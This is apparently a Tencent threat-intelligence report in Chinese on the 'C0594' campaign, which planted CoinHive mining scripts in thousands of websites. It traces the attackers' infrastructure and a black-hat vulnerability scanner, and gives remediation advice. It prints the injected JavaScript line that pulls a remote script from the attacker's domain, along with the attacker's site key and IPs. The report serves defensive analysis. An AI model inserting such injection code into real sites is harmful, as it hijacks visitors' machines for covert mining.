威胁研究正文

C0594组织恶意挖矿攻击 已攻陷数千个网站

2018-04-09 09:17:26

腾讯御见威胁情报中心近期监测发现,包括传统企业、互联网公司、学校和政府机构等在内的多个网站网页被植入挖矿JS脚本。经分析,该批站点中的核心JS文件被注入恶意代码,通过请求同一个脚本文件,加载另一个脚本文件,提供的CoinHive挖矿代码,从而在用户机器上执行挖矿。

0x1 概况

腾讯御见威胁情报中心近期监测发现,包括传统企业、互联网公司、学校和政府机构等在内的多个网站网页被植入挖矿JS脚本。经分析,该批站点中的核心JS文件被注入恶意代码,通过请求同一个脚本文件(http://a.c0594.com/?e=5),加载另一个脚本文件(http://a.c0594.com/?js=1)提供的CoinHive挖矿代码,从而在用户机器上执行挖矿。


与以往直接在网页源码插入CoinHive挖矿代码不同,此次发现的挖矿行为通过动态加载JS文件,在不同网页中插入同样的恶意代码,并且统计收益的Site Key也相同,可以推测是同一个组织进行的一次有组织的攻击。由于该段挖矿代码来源于a.c0594.com,我们暂且将其称为C0594组织恶意挖矿事件。


0x2 事件分析

以该批站点中的bayimg.co网站为例,分析如下:

bayimg.co网站源码,可看到JSjquery.cookie.js被注入了恶意代码:

document.write('<script src=http://a'+'.c059'+'4.com/?e=5></script>')


hxxp://a.c0594.com/?e=5同时会调用hxxp://a.c0594.com/?js=1

从而链接到CoinHive挖矿平台,执行挖矿操作。


挖矿收益最终归属为Coinhive.com对应Site Key: 99nheD84S8eJK7eD4pufvR5Wd1KGjxlj

whorunscoinhive.com查询该Site Key挖矿的网页月流量达1011442,排在网页挖矿top榜第56位:


0x3 木马溯源

通过搜索引擎,可看到该组织早在2014年就开始对大量网站进行攻击:


使用腾讯御见威胁情报平台对a.c0594.com进行反查,发现该域名曾解析到ip 62.210.181.5547.89.176.191


继续反查这两个ip,发现其下存在较多xxx.c0594.com以及xxx.094n.com的域名。



其中域名member.094n.com引起了我们的注意。


该平台提供webshell列表、WordPress漏洞列表、网站注入点管理等功能。在产品更新记录中还可以看到对struct漏洞攻击、SQLMAP注入攻击等的更新记录。


从网站下载最新的软件得到一款名为Black Spider的黑帽辅助软件。


该软件可以批量检测网站的漏洞,提供功能包括:自动爬取Getshell、自动扫描注入点、自动文件探测、旁站C段扫描、漏洞扫描、CMS安全检测、批量检测注入等。


软件的CMS.txt文件记录了支持检测的一百多种建站系统漏洞,包括学校建站系统、企业建站系统、文章管理等建站系统的漏洞。


针对各类漏洞,Black Spider.exe构造对应的url请求进行检测。


该工具可以检测出此次中招网站的Fck上传等漏洞。不法分子亦可利用此工具,通过后门植入挖矿代码或执行其它恶意动作。



Black Spider工具由Alihack.com开发而成,从挖矿木马所在网站a.c0594.com与黑客工具网站member.094n.comIP信息也可看出二者关系微妙。



0x4 安全建议

腾讯安全专家建议如下:

1. 使用腾讯企业安全“御知”(检测地址:https://s.tencent.com/product/yuzhi/index.html)进行风险扫描和站点监控,及时修复Web服务器建站系统安全漏洞。


2. 网站管理员自查网站源码中是否包含“src=hxxp://a'+'.c059'+'4.com/?e=5”,若有,则表示已被入侵,可删除相关恶意代码。

3. 网站管理员可使用腾讯云网站管家智能防护平台,其具备Web入侵防护,0Day漏洞补丁修复等多纬度防御策略,可全面保护网站系统。下载地址:https://cloud.tencent.com/product/waf

  4. 普通网民可使用腾讯电脑管家拦截含挖矿木马的网页。


0x5 附录

受影响网站(部分):



在线咨询

方案定制